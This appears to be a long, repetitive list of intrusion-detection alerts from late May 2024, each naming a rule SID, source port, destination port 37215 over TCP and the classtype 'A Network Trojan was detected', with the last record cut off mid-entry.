            SID:2829579
            Source Port:45908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.831608
            SID:2835222
            Source Port:50110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825392
            SID:2835222
            Source Port:39420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870708
            SID:2835222
            Source Port:46246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.498333
            SID:2829579
            Source Port:32810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852153
            SID:2835222
            Source Port:44924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066644
            SID:2829579
            Source Port:54694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433539
            SID:2829579
            Source Port:49182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810931
            SID:2835222
            Source Port:38244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860184
            SID:2835222
            Source Port:49114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261051
            SID:2829579
            Source Port:44560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821945
            SID:2829579
            Source Port:41868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841827
            SID:2829579
            Source Port:48502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916695
            SID:2829579
            Source Port:38612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877743
            SID:2835222
            Source Port:49494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375201
            SID:2829579
            Source Port:36756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.539895
            SID:2835222
            Source Port:54432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955936
            SID:2835222
            Source Port:57174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.566019
            SID:2829579
            Source Port:42634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.865386
            SID:2829579
            Source Port:49954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766924
            SID:2829579
            Source Port:37154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261400
            SID:2835222
            Source Port:55546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961070
            SID:2835222
            Source Port:52486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675843
            SID:2829579
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507629
            SID:2835222
            Source Port:40206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445226
            SID:2829579
            Source Port:48430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814346
            SID:2835222
            Source Port:36802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910591
            SID:2829579
            Source Port:60724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582621
            SID:2835222
            Source Port:56448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807547
            SID:2835222
            Source Port:36198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444117
            SID:2835222
            Source Port:43410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432575
            SID:2829579
            Source Port:36110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736566
            SID:2829579
            Source Port:39376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.670116
            SID:2829579
            Source Port:58902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856288
            SID:2835222
            Source Port:54688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.027220
            SID:2829579
            Source Port:60922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887739
            SID:2829579
            Source Port:57766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855578
            SID:2829579
            Source Port:43946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899259
            SID:2835222
            Source Port:49680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900756
            SID:2835222
            Source Port:57226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450861
            SID:2829579
            Source Port:57930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883834
            SID:2835222
            Source Port:42456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746725
            SID:2835222
            Source Port:44844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748394
            SID:2829579
            Source Port:58084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308092
            SID:2829579
            Source Port:45054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057825
            SID:2829579
            Source Port:42776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005068
            SID:2835222
            Source Port:46586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026494
            SID:2835222
            Source Port:44404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617854
            SID:2829579
            Source Port:53644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860733
            SID:2829579
            Source Port:57410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839636
            SID:2829579
            Source Port:41496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.447031
            SID:2829579
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854789
            SID:2829579
            Source Port:43286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765974
            SID:2829579
            Source Port:35914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735647
            SID:2829579
            Source Port:48646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912104
            SID:2829579
            Source Port:48506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.563804
            SID:2829579
            Source Port:59662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185646
            SID:2835222
            Source Port:39296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309324
            SID:2829579
            Source Port:42156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321549
            SID:2829579
            Source Port:53690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714505
            SID:2829579
            Source Port:51548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866038
            SID:2835222
            Source Port:33274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.339936
            SID:2835222
            Source Port:39844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746053
            SID:2829579
            Source Port:40920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746852
            SID:2829579
            Source Port:33260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771673
            SID:2835222
            Source Port:45584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.671422
            SID:2835222
            Source Port:45676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876367
            SID:2829579
            Source Port:38090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855341
            SID:2829579
            Source Port:33166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070898
            SID:2829579
            Source Port:58420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856369
            SID:2835222
            Source Port:34434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435739
            SID:2835222
            Source Port:49914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.476040
            SID:2829579
            Source Port:60112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863868
            SID:2829579
            Source Port:43944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065014
            SID:2835222
            Source Port:34288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880174
            SID:2835222
            Source Port:38496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276120
            SID:2835222
            Source Port:34020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066647
            SID:2829579
            Source Port:35362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002430
            SID:2835222
            Source Port:43034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534082
            SID:2829579
            Source Port:49188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989079
            SID:2835222
            Source Port:33636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989853
            SID:2829579
            Source Port:41196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312671
            SID:2835222
            Source Port:42180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.744402
            SID:2835222
            Source Port:42188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.691626
            SID:2835222
            Source Port:59882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.340077
            SID:2835222
            Source Port:40064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334129
            SID:2829579
            Source Port:50476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837850
            SID:2829579
            Source Port:50892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506767
            SID:2829579
            Source Port:48904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854882
            SID:2835222
            Source Port:57788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435715
            SID:2835222
            Source Port:57216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824603
            SID:2835222
            Source Port:45474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849560
            SID:2829579
            Source Port:44350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565054
            SID:2829579
            Source Port:41988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681580
            SID:2829579
            Source Port:41528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.937155
            SID:2835222
            Source Port:52638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049220
            SID:2835222
            Source Port:52452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386766
            SID:2829579
            Source Port:44794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158420
            SID:2829579
            Source Port:51878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543826
            SID:2835222
            Source Port:39020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821737
            SID:2835222
            Source Port:47706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604287
            SID:2829579
            Source Port:44204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755798
            SID:2829579
            Source Port:35502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793478
            SID:2829579
            Source Port:48710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962868
            SID:2829579
            Source Port:58338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752906
            SID:2835222
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872164
            SID:2835222
            Source Port:53366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533529
            SID:2829579
            Source Port:35116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809996
            SID:2835222
            Source Port:55906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899566
            SID:2829579
            Source Port:53246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333299
            SID:2829579
            Source Port:36784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739000
            SID:2829579
            Source Port:37472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793351
            SID:2829579
            Source Port:39828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840528
            SID:2835222
            Source Port:57730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985280
            SID:2829579
            Source Port:37220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961108
            SID:2829579
            Source Port:43592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012079
            SID:2829579
            Source Port:39368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421627
            SID:2829579
            Source Port:39896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955347
            SID:2835222
            Source Port:49740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899412
            SID:2835222
            Source Port:41246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946759
            SID:2829579
            Source Port:41020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900634
            SID:2829579
            Source Port:49816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.322495
            SID:2829579
            Source Port:36028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.442698
            SID:2829579
            Source Port:44718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.896875
            SID:2835222
            Source Port:48092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779103
            SID:2829579
            Source Port:36374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996087
            SID:2829579
            Source Port:49058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809170
            SID:2829579
            Source Port:44840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.805229
            SID:2835222
            Source Port:55180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969382
            SID:2829579
            Source Port:49638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.445827
            SID:2835222
            Source Port:44698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908556
            SID:2829579
            Source Port:58670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.900039
            SID:2829579
            Source Port:39978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.571058
            SID:2829579
            Source Port:53560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953424
            SID:2835222
            Source Port:56550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010551
            SID:2829579
            Source Port:53106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.899657
            SID:2829579
            Source Port:36406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507071
            SID:2829579
            Source Port:60070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996222
            SID:2835222
            Source Port:56262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559769
            SID:2835222
            Source Port:36172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928210
            SID:2835222
            Source Port:54066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.381758
            SID:2829579
            Source Port:55196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294595
            SID:2835222
            Source Port:38794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537058
            SID:2835222
            Source Port:46550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744606
            SID:2829579
            Source Port:40516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077883
            SID:2829579
            Source Port:49384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.685962
            SID:2835222
            Source Port:43062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084503
            SID:2835222
            Source Port:54206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879442
            SID:2835222
            Source Port:43808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945102
            SID:2835222
            Source Port:38528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863177
            SID:2835222
            Source Port:35780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930130
            SID:2829579
            Source Port:44582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508339
            SID:2835222
            Source Port:35172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809044
            SID:2829579
            Source Port:43556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807988
            SID:2835222
            Source Port:33552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922743
            SID:2835222
            Source Port:46390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842822
            SID:2835222
            Source Port:59680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956293
            SID:2835222
            Source Port:47900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.795953
            SID:2829579
            Source Port:44698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870255
            SID:2829579
            Source Port:42308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849391
            SID:2835222
            Source Port:59558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469668
            SID:2835222
            Source Port:37326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568740
            SID:2829579
            Source Port:35478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018471
            SID:2829579
            Source Port:33394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956322
            SID:2829579
            Source Port:38100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436580
            SID:2835222
            Source Port:60694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994815
            SID:2835222
            Source Port:40168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.576105
            SID:2829579
            Source Port:40568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031016
            SID:2835222
            Source Port:32934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534063
            SID:2829579
            Source Port:33124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846942
            SID:2835222
            Source Port:39396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597391
            SID:2829579
            Source Port:53328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857972
            SID:2829579
            Source Port:60386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534103
            SID:2835222
            Source Port:34972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644797
            SID:2835222
            Source Port:39150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437039
            SID:2835222
            Source Port:46210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868174
            SID:2835222
            Source Port:38936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850983
            SID:2835222
            Source Port:53090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473237
            SID:2835222
            Source Port:39280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926257
            SID:2829579
            Source Port:49008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778442
            SID:2829579
            Source Port:52680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963461
            SID:2835222
            Source Port:32896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909104
            SID:2829579
            Source Port:59564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.998432
            SID:2829579
            Source Port:59978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058541
            SID:2835222
            Source Port:42804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279543
            SID:2835222
            Source Port:49580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.724003
            SID:2835222
            Source Port:33112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048624
            SID:2829579
            Source Port:54650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739966
            SID:2829579
            Source Port:47618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776313
            SID:2829579
            Source Port:33338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436709
            SID:2829579
            Source Port:49298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809435
            SID:2829579
            Source Port:53958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717116
            SID:2835222
            Source Port:58056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778209
            SID:2835222
            Source Port:33086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425069
            SID:2835222
            Source Port:34556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741979
            SID:2835222
            Source Port:42566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870098
            SID:2835222
            Source Port:56848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918270
            SID:2835222
            Source Port:47852
            Destination Port:37215
